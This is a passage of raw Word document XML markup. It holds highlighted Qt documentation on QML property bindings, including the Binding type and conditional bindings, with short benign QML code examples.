          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In QML, property bindings </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>result in a dependency between the properties of different objects</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="00A50E12">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1221" w:name="binding-to-an-inaccessible-property"/>
      <w:bookmarkStart w:id="1222" w:name="_Toc483000785"/>
      <w:bookmarkStart w:id="1223" w:name="_Toc483003783"/>
      <w:bookmarkStart w:id="1224" w:name="_Toc483604137"/>
      <w:bookmarkStart w:id="1225" w:name="_Toc483605357"/>
      <w:bookmarkEnd w:id="1221"/>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binding to an inaccessible property</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1222"/>
      <w:bookmarkEnd w:id="1223"/>
      <w:bookmarkEnd w:id="1224"/>
      <w:bookmarkEnd w:id="1225"/>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes it is necessary </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to bind an object's property to that of another object that isn't directly instantiated by QML, such as a property of a class exported to QML by C++</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. You can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binding type to establish this dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>binding any value to any object's property</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, in a C++ application that maps an "app.enteredText" property into QML, you can use Binding to update the enteredText property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF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7C2FF8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TextEdit</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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id</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myTextField</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text</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w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Please type here..."</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Binding</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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target</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app</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w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</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w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"enteredText"</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value</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myTextField</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text </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changes, the C++ property</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enteredText</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will update automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="002736BE" w:rsidRDefault="007C2FF8" w:rsidP="00A50E12">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1226" w:name="conditional-bindings"/>
      <w:bookmarkStart w:id="1227" w:name="_Toc483000786"/>
      <w:bookmarkStart w:id="1228" w:name="_Toc483003784"/>
      <w:bookmarkStart w:id="1229" w:name="_Toc483604138"/>
      <w:bookmarkStart w:id="1230" w:name="_Toc483605358"/>
      <w:bookmarkEnd w:id="1226"/>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Conditional bindings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1227"/>
      <w:bookmarkEnd w:id="1228"/>
      <w:bookmarkEnd w:id="1229"/>
      <w:bookmarkEnd w:id="1230"/>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In some cases you may want </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to modify the value of a property when a certain condition is met but leave it unmodified otherwise</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Often, it's not possible to do this with direct bindings, as you have to supply values for all possible branches.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the code snippet below results in a warning whenever you release the mouse. This is because the value of the binding is undefined when the mouse isn't pressed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="000821BB" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// produces warning: "Unable to assign [undefined] to double value"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value</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w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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mouse</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pressed</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 xml:space="preserve"> mouse</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mouseX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Binding type can prevent this warning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="000821BB" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binding</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on value </w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="000821BB" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when</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mouse</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pressed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="000821BB" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">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value</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mouse</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mouseX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="000821BB" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Binding type restores any previously set direct bindings on the property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRDefault="00A50E12" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
